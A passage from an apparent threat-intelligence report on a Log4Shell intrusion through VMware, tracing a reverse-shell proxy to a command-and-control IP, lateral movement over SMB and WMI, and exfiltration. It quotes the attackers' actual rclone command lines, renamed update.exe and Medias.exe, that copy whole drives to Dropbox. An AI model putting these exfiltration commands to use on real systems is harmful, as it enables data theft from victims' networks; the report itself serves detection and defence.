- IT 리더가 지목한 AI 가치 실현의 최대 걸림돌은 ‘비용 관리’
- Los CIO consideran que la gestión de costes puede acabar con el valor de la IA
- 칼럼 | AI 에이전트, 지금까지의 어떤 기술과도 다르다
- The $23 Echo Dot deal is a great deal to upgrade your smart home this Black Friday
- Amazon's Echo Spot smart alarm clock is almost half off this Black Friday
Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware
Lateral movement to machines in the network
After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is a stowaway proxy tool that is publicly available on Github. The tool is written in the GO language and can provide many capabilities to threat actors: remote shell execution, upload/downloading files, and more. In this case, the tool is used to provide a reverse shell to threat actors on IP: 45[.]32.108.54 on port 80.
After a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines.
Data exfiltration
In one case, we found an interesting binary file named update.exe. The file is actually the rclone.exe tool used to exfiltrate data to a specific Dropbox location. While uploading the data, the Rclone tool may upload to different IPs over time:
162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)
CLI command:
cmd.exe /Q /c update.exe copy J: 4:1 -q –ignore-existing –max-age 2y –exclude *.exe 1> \127.0.0.1ADMIN$__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q –ignore-existing –max-age 2y –exclude *.exe 1> \127.0.0.1ADMIN$__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q –ignore-existing –max-age 2y –exclude *.exe 1> \127.0.0.1ADMIN$__1649007856.0151849 2>&1
In another intrusion, the same tool was used for data exfiltration using a different name: Medias.exe.
Medias.exe copy ‘\[Private IP] G$’ dropbox:ag -q –ignore-existing –max-age 2y –auto-confirm –multi-thread-streams 12 –transfers 10 –ignore-errors –exclude “*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}”